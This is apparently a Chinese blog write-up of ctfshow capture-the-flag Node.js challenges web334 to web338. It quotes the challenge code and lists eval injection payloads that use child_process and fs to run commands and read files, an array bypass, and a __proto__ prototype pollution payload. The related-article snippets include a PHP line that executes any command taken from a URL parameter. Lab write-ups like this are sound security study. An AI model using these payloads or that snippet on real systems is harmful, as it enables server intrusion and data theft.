ctfshow——web入门334~338

最新推荐文章于 2025-07-31 15:38:52 发布
原创 最新推荐文章于 2025-07-31 15:38:52 发布 · 669 阅读 · 17 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#前端 #javascript #服务器

原型链污染资料
 

web入门334

web入门335

web入门336

web入门337

web入门338

web入门334

提示里面给了压缩包,解压看看有什么东西

然后

login.js

var express = require('express');
var router = express.Router();
var users = require('../modules/user').items;
 
var findUser = function(name, password){
  return users.find(function(item){
    return name!=='CTFSHOW' && item.username === name.toUpperCase() && item.password === password;
  });
};

/* GET home page. */
router.post('/', function(req, res, next) {
  res.type('html');
  var flag='flag_here';
  var sess = req.session;
  var user = findUser(req.body.username, req.body.password);
 
  if(user){
    req.session.regenerate(function(err) {
      if(err){
        return res.json({ret_code: 2, ret_msg: '登录失败'});        
      }
       
      req.session.loginUser = user.username;
      res.json({ret_code: 0, ret_msg: '登录成功',ret_flag:flag});              
    });
  }else{
    res.json({ret_code: 1, ret_msg: '账号或密码错误'});
  }  
  
});

module.exports = router;

有个 return name!=='CTFSHOW' && item.username === name.toUpperCase() && item.password === password;

toUpperCase() 强制大写

web入门335

有个eval=

各种方法:

?eval=require('child_process').execSync('ls')

?eval=require('child_process').execSync('cat f*')

?eval=require('child_process').execSync('ls').toString()

?eval=require('child_process').execSync('cat fl00g.txt').toString()

?eval=require('child_process').spawnSync('ls').stdout.toString()

?eval=require('child_process').spawnSync('ls',['.']).stdout.toString()

?eval=require('child_process').spawnSync('ls',['./']).stdout.toString()

?eval=require('child_process').spawnSync('cat',['fl00g.txt']).stdout.toString() //不能通配符

?eval=global.process.mainModule.constructor._load('child_process').execSync('ls',['.']).toString()

web入门336

一样,不过过滤了exec

?eval=require('child_process').spawnSync('ls').stdout.toString()

?eval=require('child_process').spawnSync('cat',['fl001g.txt']).stdout.toString()

还有一种:

传?eval=__filename可以看到路径为/app/routes/index.js

然后传?eval=require('fs').readFileSync('/app/routes/index.js','utf-8')

?eval=require('fs').readdirSync('.')

?eval=require('fs').readFileSync('fl001g.txt','utf-8')

web入门337
node.js拼接

console.log(5+[6,6]); //56,6

console.log("5"+6); //56

console.log("5"+[6,6]); //56,6

console.log("5"+["6","6"]); //56,6

?a[]=1&b[]=1

?a[a]=1&b[b]=1

反正就是数组绕过

web入门338

app.js

var createError = require('http-errors');
var express = require('express');
var ejs = require('ejs');
var path = require('path');
var cookieParser = require('cookie-parser');
var logger = require('morgan');
var session = require('express-session');
var FileStore = require('session-file-store')(session);

var indexRouter = require('./routes/index');
var loginRouter = require('./routes/login');

var app = express();

//session
var identityKey = 'auth';
 
app.use(session({
  name: identityKey,
  secret: 'ctfshow_session_secret', 
  store: new FileStore(), 
  saveUninitialized: false, 
  resave: false,
  cookie: {
    maxAge: 60 * 60 * 1000 // 有效期,单位是毫秒
  }
}));

// view engine setup
app.set('views', path.join(__dirname, 'views'));
app.engine('html', require('ejs').__express); 
app.set('view engine', 'html');

app.use(logger('dev'));
app.use(express.json());
app.use(express.urlencoded({ extended: false }));
app.use(cookieParser());
app.use(express.static(path.join(__dirname, 'public')));

app.use('/', indexRouter);
app.use('/login', loginRouter);

// catch 404 and forward to error handler
app.use(function(req, res, next) {
  next(createError(404));
});

// error handler
app.use(function(err, req, res, next) {
  // set locals, only providing error in development
  res.locals.message = err.message;
  res.locals.error = req.app.get('env') === 'development' ? err : {};

  // render the error page
  res.status(err.status || 500);
  res.render('error');
});

module.exports = app;

ctfshow要等于36dboy

secert类为空,直接继承了Object类,所以secert类中没有ctfshow,我们可以通过user污染Object类,在Object类里面加一个ctfshow。判断secert.ctfshow==='36dboy'时,找不到ctfshow,会从Object里面找

文章

也就是说,如果有一个当前类没有的属性,会一直通过该类所继承的父类不断的查找,

所以这里的common.js就很像例子中的

所以就

{"a":1, "__proto__": {"ctfshow":"36dboy"}}

uwvwko
关注
CTFshow——web入门(信息泄露)
doraemon12345的博客
05-30 1706
web1 源码泄露 直接 f12 在下面注释行中可以看到flag web2 前台js绕过 方法有很多: 1.ctrl+u 查看源代码 2.burp抓包查看 3.在网址前加上view-source:即可查看源代码 web3 协议头信息泄露 题目提示没思路抓包看看,就用burp抓个包看看,在响应头里发现flag web4 robots后台泄露 题目提示:总有人把后台地址写入robots,帮黑阔大佬们引路。 访问robots.txt,得到flag地址/flagishere.txt,访问该地址拿到flag web
ctfshow——web(总结&持续更新)
qq_55202378的博客
10-31 828
是证书的原因,目前的解决方法是将URL中的https改为http。连用时,数据包中的post字段将会当做php代码执行。后面接着的数据会被当做php代码执行。
ctfshow——web入门139~146
uwvwko的博客
02-28 829
这里是使用了时间盲注,|管道符将 cat /f149_15_h3r3 的输出作为后面的输入 ,因为flag的格式已知,除了{}由44个字符组成,然后通过对str便利,如果if成立,sleep 3。这里我们用v3=*("%0c%06%0c%0b%05%0d"^"%7f%7f%7f%7f%60%60")("%0c%0c"^"%60%7f")*字符串形式的字母或数字(如 "a", "b123", 等),在 PHP 中,任何以字母开头的字符串在转换为整数时通常会被视为 0。),则认为条件为真,即找到了正确字符。
ctfshow——web入门108~114
uwvwko的博客
02-12 857
v2=abc (构造类)考虑查看目录函数的替代:scandir()、golb()、dirname()、basename()、realpath()、getcwd()file=php://filter/zlib.deflate|zlib.inflate/resource=flag.php。其中 scandir()、golb() 、dirname()、basename()、realpath() 需要给定参数。(详细链接)是 PHP 中的一个类,用于遍历文件系统目录中的文件和子目录,但是需要给他一个路径。
ctfshow——web入门254~258
uwvwko的博客
05-17 1170
结果:O:11:"ctfShowUser":3:{s:8:"username";结果:O:11:"ctfShowUser":3:{s:8:"username";然后我们怎么调用他呢,看到ctfShowUser类中的 __destruct,但是如果照他的源代码,class=new info()简单分析就是传入的username和password的值回去当作login方法的参数,然后只要让他们和类中的值一样就好了。
ctfshow——web入门176~180
uwvwko的博客
04-01 691
表:-1'union/**/select/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()%23。库:-1'union/**/select/**/1,2,database()%23。-1'order/**/by/**/3%23(最后面的'要使用url编码)因为--+中的+是空格的意思,所以是过滤了空格,那我们就用/**/代替。但%0c(换页)可以。
ctfshow——web入门——128~132
uwvwko的博客
02-21 255
x && y 当x为false时,直接跳过,不执行y;x||y 当x为true时,直接跳过,不执行y。成立,所以payload:?在不加转义字符的前提下,前面的点表示任意字符,而“+?ctfshow/is' 后面的i表示大小写匹配,s表示忽略换行符,单行匹配。(因为有call_user_func在我们就不用加括号,f1,f2会被直接调用)_()==gettext() 是gettext()的拓展函数,开启text扩展。
ctfshow——web入门191~194
uwvwko的博客
04-16 308
用于获取单个字符的 Unicode 码点(code point)。这意味着它接受一个长度为 1 的字符串(即单个字符),并返回该字符对应的整数值。right()返回具有指定长度的字符串的右边部分,用法同上。eft()返回具有指定长度的字符串的左边部分。这里过滤了ascii,我们可以使用ord。逻辑和前几题一样,只不过过滤了ord。我们可以用mid或者lpad。改成ord的形式就可以了。但字母数字都放出来了。
ctfshow——web入门361~368
uwvwko的博客
05-05 647
最近练习ssti当 Web 应用程序使用模板引擎动态生成 HTML 页面或其他类型的输出时,如果用户输入未经过充分验证或转义就被直接嵌入到模板中,就可能发生 SSTI 攻击。攻击者可以利用这个弱点注入恶意模板代码,该代码将在服务器端执行。eg: {{}}在Jinja2中作为变量包裹标识符,Jinja2在渲染的时候会把{{}}包裹的内容当做变量解析替换。比如{{2*2}}会被解析成4。因此才有了现在的模板注入漏洞。往往变量我们使用{{恶意代码}}。
ctfshow——web入门351~356
uwvwko的博客
05-12 831
这个写全了,但是这个禁止的是127.0形式的,也就是127.1.1.1就可以绕过。emmm这题怎么说呢,过滤的语句不完全,上题的payload照样可以用。对host长度进行了限制,即主机名小于等于5。使用解析到127.0.0.1的url绕过。(这两个是其他师傅提供的可以用的)(127开头的都行)
ctfshow——web入门186~190
uwvwko的博客
04-09 205
ffifdyop的MD5加密结果是276f722736c95d99e921722cf9ed621c,经过MySQL编码后会变成’or’6xxx, 只要第一位是非零数字即可被判定为True,后面的会在MySQL将其转换成整型比较时丢掉 使SQL恒成立,相当于万能密码,可以绕过md5()函数的加密。在这个查询中,因为username是个字符串,我们只要令$username=0, 因为弱比较,username就会转化为0,成立。密码错误的Unicode 编码为\u5bc6\u7801\u9519\u8bef。
CTFshow web入门——文件上传
热门推荐
小元砸的博客
03-14 1万+
Web 151
[ctfshow]web入门——命令执行(web72-web77)
ShenZ的博客
12-02 2758
ctfshow的命令执行(web72-77)
[ctfshow]web入门——文件上传(web156-web163)
ShenZ的博客
03-18 5938
[ctfshow]web入门——文件上传 web156 上传.user.ini web157 web158 web159 web160 上传.user.ini+日志包含 web161 web162 way1:远程文件包含 way2:session条件竞争包含 web163 上传口 试了试upload界面有一个默认文件,可以用上传.user.ini的方法 后台应该是屏蔽了很多字符串(php
5G毫米波射频前端设计:从GaN功放到混合信号集成方案
ytttr873的博客
07-31 284
同时,GaN功放还具备较高的功率附加效率(PAE),相比传统的半导体材料功放,能够在提供相同功率输出的情况下消耗更少的电能,这对于降低设备的能耗和散热需求具有重要意义。随着5G通信技术的飞速发展,毫米波频段凭借其丰富的频谱资源,成为满足5G高速率、大容量数据传输需求的关键频段。然而,毫米波信号的高频特性带来了诸多设计挑战,射频前端作为无线通信系统中负责信号发射与接收的核心部分,其设计至关重要。GaN功放通过优化电路设计和工艺,能够在高功率输出的情况下保持良好的线性度,确保信号在传输过程中的准确性和可靠性。
js面试题 高频(12-22题)
m0_63472757的博客
07-29 1004
1.代码服用与抽象: 高阶函数可以将重复的逻辑抽象出来,形成通用函数,提高代码的复用性,柯李华可以将复杂的函数调用转化为一系列简单的步骤,便于部分应用和服用2.函数组合: 高阶函数和柯里化是构建函数式编程风格的关键,它们使的函数的组合变得更容易,从而构建更复杂的功能3.延迟执行与配置化: 柯里化可以将函数执行延迟到所有参数都传入后进行,同时允许在传入部分参数时进行配置,生成定制化的新函数。
Vue3 中 toValue 与 unref 深度解析:异同、场景与最佳实践
前端知识分享喵
07-30 760
Vue3中的toValue和unref都是响应式数据解包工具,但存在关键差异:unref仅解包ref对象,而toValue在unref基础上增加了对函数类型的支持,会自动执行函数并返回结果。toValue更适合处理动态计算和多种输入类型的场景,如组合式函数参数标准化;unref则在简单解包和性能敏感场景更具优势。开发者需注意两者对reactive对象和函数参数的不同处理方式,根据实际需求选择合适工具。
vue3卡片垂直无限滚动
qq_63605379的博客
07-28 235
主要是利用css动画向上滚动,js动态计算dom上有多少条数据实时更新滚动速度。js 要在onMounted里调用确保dom已经被渲染。
学习 java web 简单监听器
最新发布
~
07-31 66
使用Java Servlet作为后端核心,配合监听器(Listener)实现应用生命周期管理,前端采用JSP进行动态页面渲染。核心功能包括通过Servlet处理HTTP请求,利用监听器监控ServletContext、Session和Request三种作用域对象的创建销毁及属性变更,实现资源管理和业务逻辑处理。项目中MyListener类实现了多种监听器接口,可捕获对象创建销毁事件及属性变化,为系统提供完善的监控能力。
ctfshow-web入门
01-19
### CTFShow Web 入门教程与资源 #### 图片中的隐藏后门代码 在处理CTF挑战时,有时会遇到图片中嵌入的恶意代码或后门。这类攻击通常利用图像文件格式的特点,在不影响视觉效果的前提下植入可执行代码。为了检测此类漏洞,可以使用工具如Wireshark抓包分析网络传输数据,或者通过十六进制编辑器(例如010 Editor)查看二进制内容[^1]。 ```bash # 使用010Editor打开可疑图片文件并查找异常字符序列 $ 010editor image.png ``` #### 构造命令执行Payload 对于存在命令注入风险的应用程序,可以通过精心设计输入参数来触发特定行为。比如在一个假设场景下,如果服务器端未对用户提交的数据做充分验证,则可能允许攻击者绕过安全机制执行任意指令。下面展示了如何构建用于测试目的的有效载荷: ```php <?php // 测试用PHP代码片段模拟远程命令执行 $c = $_GET['c']; exec($c, $output); echo implode("\n", $output); ?> ``` 实际操作时应谨慎对待任何涉及系统调用的功能,并确保只针对授权环境开展实验性活动[^2]。 #### PHP随机数生成函数反向工程 某些情况下,了解目标应用内部工作原理有助于找到解决方案路径。以PHP为例,其内置伪随机数发生器`mt_rand()`依赖于初始状态——即种子值。当知道部分输出结果时,可通过逆向工程技术恢复原始种子,进而预测后续产生的数值系列。开源项目提供了实现这一过程所需的算法和编译方法[^3]。 ```cpp #include "php_mt_seed.h" int main() { // 示例:基于已知MT输出还原种子 unsigned long mt_output[] = { /* 已知的一组连续输出 */ }; int seed; find_mt_seed(mt_output, sizeof(mt_output)/sizeof(*mt_output), &seed); printf("Recovered Seed: %d\n", seed); return 0; } ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值